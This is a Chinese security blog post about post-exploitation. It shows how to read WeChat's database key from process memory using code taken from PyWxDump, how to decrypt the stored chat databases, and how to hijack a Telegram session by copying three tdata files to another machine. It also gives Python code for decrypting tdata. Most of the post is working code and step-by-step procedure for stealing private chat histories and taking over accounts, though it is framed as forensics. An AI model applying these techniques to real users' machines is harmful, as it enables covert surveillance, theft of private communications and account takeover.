浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

最近工作中遇到许多取证工作,有相关部门人员咨询相关技术问题,那么,借此机会,今天麋鹿带大家了解一下解密wx聊天记录,以及劫持tg账号,顺便浅析一下原理

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

先聊微x

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

如何获取微x的key

贴一个代码,源自此项目

https://github.com/xaoyaoo/PyWxDump

麋鹿摘选了部分关键代码来探讨如何获取wxid key这些

# 读取内存中的字符串(非key部分)
def get_info_without_key(h_process, address, n_size=64):
    array = ctypes.create_string_buffer(n_size)
    if ReadProcessMemory(h_process, void_p(address), array, n_size, 0) == 0: return "None"
    array = bytes(array).split(b"x00")[0] if b"x00" in array else bytes(array)
    text = array.decode('utf-8', errors='ignore')
    return text.strip() if text.strip() != "" else "None"


def get_info_wxid(h_process, address, n_size=32, address_len=8):
    array = ctypes.create_string_buffer(address_len)
    if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"
    address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)
    wxid = get_info_without_key(h_process, address, n_size)
    if not wxid.startswith("wxid_"): wxid = "None"
    return wxid


# 读取内存中的key
def get_key(h_process, address, address_len=8):
    array = ctypes.create_string_buffer(address_len)
    if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"
    address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)
    key = ctypes.create_string_buffer(32)
    if ReadProcessMemory(h_process, void_p(address), key, 32, 0) == 0: return "None"
    key_string = bytes(key).hex()
    return key_string


# 读取信息(account,mobile,name,mail,wxid,key)
def read_info(version_list):
    wechat_process = []
    result = []

    for process in psutil.process_iter(['name', 'exe', 'pid', 'cmdline']):
        if process.name() == 'WeChat.exe':
            wechat_process.append(process)

    if len(wechat_process) == 0:
        return "[-] WeChat No Run"

    for process in wechat_process:
        tmp_rd = {}

        tmp_rd['pid'] = process.pid
        tmp_rd['version'] = Dispatch("Scripting.FileSystemObject").GetFileVersion(process.exe())

        bias_list = version_list.get(tmp_rd['version'], None)
        if not isinstance(bias_list, list):
            return f"[-] WeChat Current Version {tmp_rd['version']} Is Not Supported"

        wechat_base_address = 0
        for module in process.memory_maps(grouped=False):
            if module.path and 'WeChatWin.dll' in module.path:
                wechat_base_address = int(module.addr, 16)
                break
        if wechat_base_address == 0:
            return f"[-] WeChat WeChatWin.dll Not Found"

        Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)
        account__baseaddr = wechat_base_address + bias_list[1]
        tmp_rd['account'] = get_info_without_key(Handle, account__baseaddr, 32) if bias_list[1] != 0 else "None"
         result.append(tmp_rd)

    return result

运行就可以得到key

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理


浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

AUTUMN LEAVES

获取key的原理

现在开始分析一下上面代码的原理

首先读取微x版本然后获得该版本的偏移地址(各版本偏移地址网上一大堆,上面那款工具里也自带  如下../version_list.json)

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

这些数字是什么意思呢,麋鹿随便找了个版本地址,前五个地址分别对应昵称、账号、手机号、邮箱(过时)、key
"3.9.2.23": [
        50320784,
        50321712,
        50320640,
        38986104,
        50321676,
        50592864
    ],

举个例子,要获取account字符(也就是修改后自定义的id,比如我的是i_still_be_milu)是如下过程

read_info(version_list)函数

1.用 psutil.process_iter 遍历所有正在运行的进程,并将所有进程的名称、可执行文件路径、进程ID以及命令行信息传入process 对象

2.检查当前进程的名称是否为 ‘WeChat.exe’,也就是找wx进程,所以获取key是需要该机器登录着微x

if process.name() == 'WeChat.exe':

3.把WeChat微x进程的 PID存储到 tmp_rd 字典

tmp_rd['pid'] = process.pid

4.获取与当前 WeChat 进程版本对应的偏移量列表,还记得上面说到的那个记录微x各版本偏移地址的json文件吗,就是在这里读取到对应的偏移地址

bias_list = version_list.get(tmp_rd['version'], None)

5.查看是否包含WeChatWin.dll模块

if module.path and 'WeChatWin.dll' in module.path:

6.如果找到WeChatWin.dll,使用 ctypes 库调用 Windows 的 kernel32.dll 中的 OpenProcess 函数,打开该进程相关联的句柄,接着读微x进程的内存

Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)
参数 0x1F0FFF 是 PROCESS_ALL_ACCESS,表示请求所有可能的访问权限;False 表示句柄不会被继承;process.pid 是当前 WeChat 进程的 PID

7.通过将wechat_base_addressbias_list[1]相加来获取微x进程的account信息的内存地址

account__baseaddr = wechat_base_address + bias_list[1]

8.用前面获取的句柄 Handle 和基址传入get_info_without_key函数读取微x内存中的数据

tmp_rd['account'] = get_info_without_key(Handle, account__baseaddr, 32) if bias_list[1] != 0 else "None"  
如果对应的偏移量为0,则表示该信息不存在,返回 "None"

进入get_info_without_key函数

9.创建一个字符串缓冲区,用于存储从进程中读取的数据。

调用 Windows API 函数 ReadProcessMemory,从进程地址 address 中读取相应数据赋值到 array 。如果读取失败,则返回 “None”。

if ReadProcessMemory(h_process, void_p(address), array, n_size, 0) == 0: return "None"

10.然后解码成utf-8并去掉字符串两端的空白字符,最后得到array,也就是account的值

get_info_wxid函数和without函数功能大同小异,不重新解读

只说一点,windows下是地址是小端序,所以用int.from_bytes将字节数组逆序排列并转换为整数类型

至此,流程一目了然,下一步:


浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

AUTUMN LEAVES

如何解密数据库


1.首先把刚才在获取到的key保存成如下格式

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

每两个字符前加一个0x,并用”,”分割开,该文件重命名为DBPass.Bin

2.打开聊天记录目录下的MSG文件夹中找到MicroMsg.db文件

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

3.在上一步的文件夹中找到Multi目录,在Multi目录找到MSG0.db文件

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

4.把上面三个文件传到我们的机器,放到一个目录,记为A目录

5.在解密的机器下载javafx-sdk-18.0.2和java环境(本机jdk11)

这里记javafx-sdk-18.0.2lib的目录为B

记jdk-11.0.2bin目录为C

6.在C目录,也就是jdk-11.0.2bin目录运行下面命令

javaw.exe  --module-path "B路径" --add-modules=javafx.base --add-modules=javafx.controls --add-modules=javafx.fxml --add-modules=javafx.graphics --add-modules=javafx.media --add-modules=javafx.swing --add-modules=javafx.web -jar chatViewTool.jar

解密工具就运行起来了

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

然后再1和2处都选择A目录,先1后2

至此,如下图,解密完成

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

翻一翻有可能找到有用信息

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理


浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

解密数据库原理



还记得聊天记录目录下的那些.db文件吗,毫无疑问这些都是加密过的SQLite数据库文件(sqlite3),那么该如何解密这个文件呢,还是像以往一样,麋鹿节选一段代码,依然选自本文开头的那个github项目



# 通过密钥解密数据库
def decrypt(key: str, db_path, out_path):
    if not os.path.exists(db_path):
        return f"[-] db_path:'{db_path}' File not found!"
    if not os.path.exists(os.path.dirname(out_path)):
        return f"[-] out_path:'{out_path}' File not found!"
    if len(key) != 64:
        return f"[-] key:'{key}' Error!"
    password = bytes.fromhex(key.strip())
    with open(db_path, "rb") as file:
        blist = file.read()

    salt = blist[:16]
    byteKey = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE)
    first = blist[16:DEFAULT_PAGESIZE]

    mac_salt = bytes([(salt[i] ^ 58) for i in range(16)])
    mac_key = hashlib.pbkdf2_hmac("sha1", byteKey, mac_salt, 2, KEY_SIZE)
    hash_mac = hmac.new(mac_key, first[:-32], hashlib.sha1)
    hash_mac.update(b'x01x00x00x00')

    if hash_mac.digest() != first[-32:-12]:
        return f"[-] Password Error! (key:'{key}'; db_path:'{db_path}'; out_path:'{out_path}' )"

    newblist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

    with open(out_path, "wb") as deFile:
        deFile.write(SQLITE_FILE_HEADER.encode())
        t = AES.new(byteKey, AES.MODE_CBC, first[-48:-32])
        decrypted = t.decrypt(first[:-48])
        deFile.write(decrypted)
        deFile.write(first[-48:])

        for i in newblist:
            t = AES.new(byteKey, AES.MODE_CBC, i[-48:-32])
            decrypted = t.decrypt(i[:-48])
            deFile.write(decrypted)
            deFile.write(i[-48:])
    return [True, db_path, out_path, key]


def batch_decrypt(key: str, db_path: Union[str, List[str]], out_path: str):
    if not isinstance(key, str) or not isinstance(out_path, str) or not os.path.exists(out_path) or len(key) != 64:
        return f"[-] (key:'{key}' or out_path:'{out_path}') Error!"

    process_list = []

    if isinstance(db_path, str):
        if not os.path.exists(db_path):
            return f"[-] db_path:'{db_path}' not found!"

        if os.path.isfile(db_path):
            inpath = db_path
            outpath = os.path.join(out_path, 'de_' + os.path.basename(db_path))
            process_list.append([key, inpath, outpath])

        elif os.path.isdir(db_path):
            for root, dirs, files in os.walk(db_path):
                for file in files:
                    inpath = os.path.join(root, file)
                    rel = os.path.relpath(root, db_path)
                    outpath = os.path.join(out_path, rel, 'de_' + file)

                    if not os.path.exists(os.path.dirname(outpath)):
                        os.makedirs(os.path.dirname(outpath))
                    process_list.append([key, inpath, outpath])
        else:
            return f"[-] db_path:'{db_path}' Error "
    elif isinstance(db_path, list):
        rt_path = os.path.commonprefix(db_path)
        if not os.path.exists(rt_path):
            rt_path = os.path.dirname(rt_path)

        for inpath in db_path:
            if not os.path.exists(inpath):
                return f"[-] db_path:'{db_path}' not found!"

            inpath = os.path.normpath(inpath)
            rel = os.path.relpath(os.path.dirname(inpath), rt_path)
            outpath = os.path.join(out_path, rel, 'de_' + os.path.basename(inpath))
            if not os.path.exists(os.path.dirname(outpath)):
                os.makedirs(os.path.dirname(outpath))
            process_list.append([key, inpath, outpath])
    else:
        return f"[-] db_path:'{db_path}' Error "

    result = []
    for i in process_list:
        result.append(decrypt(*i)) # 解密

    # 删除空文件夹
    for root, dirs, files in os.walk(out_path, topdown=False):
        for dir in dirs:
            if not os.listdir(os.path.join(root, dir)):
                os.rmdir(os.path.join(root, dir))

    return result



该代码核心在于decrypt()函数,故只解读此函数

提前说几个知识点,希望有助于读者理解下文

1.微信用的加密算法是256位的AES-CBC

2.数据库的默认的页大小是4096字节即4KB

3. 每一个数据库文件的开头16字节都保存了一段唯一且随机的盐值,作为HMAC的验证和数据的解密

4.加密文件的每一页都存有着消息认证码,算法使用的是HMAC-SHA1

5.用来计算HMAC的key与解密的key是不同的,解密用的密钥是主密钥和之前提到的16字节的盐值变化得到的


decrypt()解密函数


1.接受三个参数:密钥(字符串类型)、数据库路径(字符串类型)和输出路径(字符串类型)。


def decrypt(key: str, db_path, out_path):


2.前几行都是检测传入的那两个路径和key长度(64位)是否正确,跳过

将key转换为字节串。key.strip()是移除密钥字符串两端的空白字符。


password = bytes.fromhex(key.strip())


3.以二进制模式打开数据库文件,将整个数据库文件读取到一个字节串blist,并从字节串中提取前16个字节作为盐值(计为A)


with open(db_path, "rb") as file:
        blist = file.read()

    salt = blist[:16]


4.使用密码(key)、盐值(A)和DEFAULT_ITER参数(前面声明过)来生成一个密钥。这里使用了SHA-1哈希函数和默认的迭代次数和密钥大小


byteKey = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE)


5,下面几行用于计算用于验证数据库完整性的MAC(消息认证码)。这里使用了SHA-1哈希函数和HMAC(带密钥的哈希算法)。如果计算出的HMAC与存储在数据库中的HMAC不匹配,则返回一个错误



过程简单一点来说,就是生成一个新的盐值(记为B),用B key和DEFAULT_ITE生成一个新密钥,然后用计算出的HMAC是否与存储在数据库中的HMAC相匹配


6.分割blist


newblist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

7.用AES加密算法和CBC模式创建一个新的加密器,使用前面生成的密钥作为初始化向量,然后解密,写入文件


decrypted = t.decrypt(first[:-48])
deFile.write(decrypted)



8.重复上面过程,解密每一个块,结束


限于本文篇幅,以及为了增加文章可读性,麋鹿在解密的过程中省略了一些的细节,毕竟这东西实在是枯燥无味,麋鹿连sqlite3.connect这些函数都未做介绍,感兴趣的读者可以自己去读一下该项目的源码,最后,附上几个吾私以为不错的工具and文章



https://www.52pojie.cn/thread-1084703-1-1.html
https://github.com/x1hy9/WeChatUserDB
https://github.com/HackerDev-Felix/WechatDecrypt/blob/main/wechat.cpp
https://www.zetetic.net/sqlcipher/design/




浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

再聊tg



浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

tg目录结构



tg用户数据存放在安装目录下的tdata文件夹内。

一个有效的Telegram登录用户的目录结构如下:

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理


形象一点讲,就是下面这个样子

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理


其中,重点说一下这几个文件

  • tdata/key_datas保存了解密文件的密钥localKey

  • tdata/D877F783D5D3EF8Cs保存了与云端通信的主密钥和用户的userId

  • tdata/D877F783D5D3EF8C/map保存了用户的基本信息,如用户id,头像,姓名,注册电话,上次在线时间

  • key_datas保存了解密其他文件的主密钥localKey

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

认证和加密流程



telegram所使用的mproto通信协议是自己开发的,不过多解读

对文件和消息进行加密则用的是AES-IGE模式


浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

Session劫持



因为tg是支持多端登录的,所以能通过迁移tdata的方法来保持session

如果对方聊天记录特别多,那么复制整个tdata文件夹的这个办法实在是过于臃肿局限,所以一般情况只需要复制下面三个文件即可达到劫持目的

  • tdata/key_datas

  • tdata/D877F783D5D3EF8Cs

  • tdata/D877F783D5D3EF8C/map

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

如上图所示,把这三个文件(登录tg的A机器里)复制到另外一台机器(B)对应目录以后,在B机器运行tg程序即可劫持,可以正常收到消息


还有一种情况,如果对方机器上登录过多个不同账号

对应文件名按如下顺序生成


D877F783D5D3EF8C
A7FDF864FBC10B77
F8806DD0C461824F
C2B05980D9127787
0CA814316818D8F6


一些重点

  1. 如果想两台机器同时登录这个被劫持的tg号,需要在账号本人的机器上挂代理,要不会掉

  2. 如果tg开启了两步验证,需要知道密码


浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

加解密原理分析


不想贴tg的代码分析了,显得文章过于臃肿,贴一个前辈的文章吧

https://www.ifmobi.com/telegram/1150.html


如这篇文章所诉,加密的代码在下面这三个文件


storage_file_utilities.cpp
mtproto_auth_key.h
mtproto_auth_key.cpp


解密过程



先用sha512(salt + passcode + salt)生成hash值

接下来再调用pbkdf2_hmac函数,将hash和salt作为输入参数,进行重复计算后得到最终的导出密钥passcode_key,然后带入decrypt_local解出local_key最后用local_key去解密其他文件


(只截取部分关键代码)

class TdataReader:
    DEFAULT_DATANAME = 'data'

    def __init__(self, base_path: str, dataname: str = None):
        self._base_path = base_path
        self._dataname = dataname or TdataReader.DEFAULT_DATANAME

    def read(self, passcode: str = None) -> ParsedTdata:
        parsed_tdata = ParsedTdata()
        parsed_tdata.settings = self.read_settings()

        local_key, account_indexes = self.read_key_data(passcode)

        accounts = {}

        for account_index in account_indexes:
            account_reader = AccountReader(self._base_path, account_index, self._dataname)
            accounts[account_index] = account_reader.read(local_key)

        parsed_tdata.accounts = accounts
        return parsed_tdata

    def read_key_data(self, passcode: str = None) -> Tuple[bytes, List[int]]:
        if passcode is None:
            passcode = ''

        key_data_tdf = read_tdf_file(self._path(self._key_data_name()))
        local_key, account_indexes_data = decrypt_key_data_tdf(passcode.encode(), key_data_tdf)
        account_indexes, _ = read_key_data_accounts(BytesIO(account_indexes_data))

        return local_key, account_indexes




def create_local_key(passcode: bytes, salt: bytes) -> bytes:
    if passcode:
        iterations = kStrongIterationsCount
    else:
        iterations = 1

    password = hashlib.sha512(salt + passcode + salt).digest()
    return hashlib.pbkdf2_hmac('sha512', password, salt, iterations, 256)


def create_legacy_local_key(passcode: bytes, salt: bytes) -> bytes:
    if passcode:
        iterations = LocalEncryptIterCount
    else:
        iterations = LocalEncryptNoPwdIterCount

    return hashlib.pbkdf2_hmac('sha1', passcode, salt, iterations, 256)



def decrypt_key_data_tdf(passcode: bytes, key_data_tdf: RawTdfFile):
    stream = BytesIO(key_data_tdf.encrypted_data)

    salt = read_qt_byte_array(stream)
    key_encrypted = read_qt_byte_array(stream)
    info_encrypted = read_qt_byte_array(stream)

    passcode_key = create_local_key(passcode, salt)
    local_key = decrypt_local(key_encrypted, passcode_key)

    info_decrypted = decrypt_local(info_encrypted, local_key)
    return local_key, info_decrypted




def create_local_key(passcode: bytes, salt: bytes) -> bytes:
    if passcode:
        iterations = kStrongIterationsCount
    else:
        iterations = 1

    password = hashlib.sha512(salt + passcode + salt).digest()
    return hashlib.pbkdf2_hmac('sha512', password, salt, iterations, 256)



这里麋鹿实在是想展开好好讲讲,可是这样会文章过于臃肿,而又有很少的读者会有耐心和兴趣读下去,其次实在是浪费麋鹿自身时间,最关键的是我今晚写文章忘了吃饭,现在饿的头晕,不夸张,是真的快饿倒了,现在大脑十分疲惫加上着急去吃饭,怕一时笔误误导读者

鉴于以上原因,麋鹿这里依然省略部分细节问题,最后放上一个解密工具,有兴趣的读者可以自行阅读代码


https://github.com/ntqbit/tdesktop-decrypter




欢迎师傅们添加麋鹿微信一起探讨学习(i_still_be_milu)

原文始发于微信公众号(麋鹿安全):浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理

版权声明:admin 发表于 2023年11月30日 下午10:01。
转载请注明:浅析 后渗透之提取微x 聊天记录原理and劫持tg 解密聊天记录原理 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...